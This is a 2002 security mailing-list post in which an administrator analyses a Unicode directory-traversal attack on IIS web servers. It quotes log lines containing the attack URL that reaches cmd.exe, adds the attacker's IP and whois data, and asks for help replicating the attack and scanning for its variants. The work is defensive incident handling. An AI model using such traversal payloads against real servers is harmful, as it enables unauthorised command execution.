RE: Unicode Attack (FOLLOW UP)

From: Jeremy Junginger <jjunginger(at)usbestcrm.com>
Date: Wed Nov 13 2002 - 12:52:37 EST

Follow up:

The attacking host at 210.201.100.253 is a Windows 2000 Chinese Server, trojaned with RemoteNC running on port 5700 (which is password protected). He is also running "X-FTP" which allows anonymous downloading as well as posting (d'oh). It seems reasonable to assume that this host is being controlled by a malicious entity that is using it to fire off automated scripts. Also an intersting note is the following:

Search results for: 210.201.100.253

OrgName: Asia Pacific Network Information Centre OrgID: APNIC

NetRange: 210.0.0.0 - 211.255.255.255
CIDR: 210.0.0.0/7
NetName: APNIC-CIDR-BLK2
NetHandle: NET-210-0-0-0-1
Parent:
NetType: Allocated to APNIC

NameServer: ns1.apnic.net
NameServer: ns3.apnic.net
NameServer: ns.ripe.net
NameServer: rs2.arin.net
NameServer: dns1.telstra.net

Comment: This IP address range is not registered in the ARIN database.

            For details, refer to the APNIC Whois Database via
            WHOIS.APNIC.NET or 
http://www.apnic.net/apnic-bin/whois2.pl
            ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
            for the Asia Pacific region. APNIC does not operate networks
            using this IP address range and is not able to investigate
            spam or abuse reports relating to these addresses. For more
            help, refer to 
http://www.apnic.net/info/faq/abuse

RegDate: 1996-07-01
Updated: 2002-09-11

OrgTechHandle: SA90-ARIN
OrgTechName: System Administrator, System OrgTechPhone: +61 7 3858 3100
OrgTechEmail:

# ARIN Whois database, last updated 2002-11-12 19:05 # Enter ? for additional hints on searching ARIN's Whois database.

Interesting how they "are not able to investigate SPAM or abuse reports relating to these ranges." Looks like a perfect place for a zombie. Thoughts? What would you do?

-Jeremy

-----Original Message-----
From: Jeremy Junginger
Sent: Wednesday, November 13, 2002 7:51 AM To: incidents@securityfocus.com
Subject: Unicode Attack

It's time again to ask the group for some assistance with interpretation of web logs and snort alerts. There was some funny activity on the web farm. I noticed a couple "ATTACK RESPONSES-http dir listing" attacks on some of our web servers, queueing me in to the fact that the servers in question were not patched against a Unicode-type vulnerability. I found the offending IP, and tracked it back to a broadband home connection. I think with reasonable certainty that the attack was not spoofed (because of the nature of TCP and the fact that he received a response from the web server); however, I cannot rule out the possibility of the host being compromised. Knowing this, I reported it to our ISP and blocked access immediately, and began to analyze the logs more closely. The web logs are continuous, so I am assuming that they are intact, though they may be suspect. There are no lapses in time, and the logs appear to be fairly contiguous. I also noticed that the attack was scripted, as there were many WEB-IIS SAM RETRIEVAL attempts interspersed with the Unicode strings, all happening in less than 10 seconds. The log entries of the first server are below.

Web log entries:

2002-11-12 13:00:37 210.201.100.253 - x.x.x.17 80 GET

/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe /c+dir 200 1849 321
31 HTTP/1.1 63.241.137.233
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) - -

2002-11-12 13:00:37 210.201.100.253 - x.x.x.17 80 GET

/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe /c+dir 200 1849 321
31 HTTP/1.1 63.241.137.233
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) - -

This is an IIS 5.0/Win2k Server with SP2 and Latest Hotfixes per HFNETCHECK, which I thought would preclude this server from being vulnerable to a Unicode-type attack. The only thing that has not been done is running URLSCAN and IISLOCKDOWN. Obviously, these will be my steps for patching the servers, but I would like to ask for some assistance with replicating the attack.

INTERESTING NOTE: The web logs indicate that the URL Requested was
(correct me if I'm wrong)
http://x.x.x.17/scripts/..%5c..%5c..%5cwinnt/system32.cmd.exe?/c+dir
(possibly with a c:\ at the end).

When running this URL against the server, it produces a 404 error on the server rather than listing the drive contents. The snort logs
(Snort/MySQL/PHP/ACID/Apache) indicate that the URL was
http://x.x.x.17/scripts/..%5c..%5c..%5cwinnt/system32.cmd.exe?/c+dir .

I guess my question is three-fold:

1. Does the IIS server "decode" the string before logging it to the web

logs?

• Does the Snort IDS "decode" the string before logging it to MySQL?

• Since there are few (if any) thorough Unicode scanners, is it possible to write a perl script that could check for all possible Unicode variants on a given web server to test the effectiveness of the URLSCAN and IISLOCKDOWN utilities (pre-change/post-change pen-test)? I have some "shell" programs like uni.pl, but am a little confused about how to generate all of the possible combinations.

If you guys can provide any assistance with this, it would be great. If not, thanks for taking the time to read the post. Have a good one!

-Jeremy

---

---

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

---

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Received on Wed Nov 13 17:39:35 2002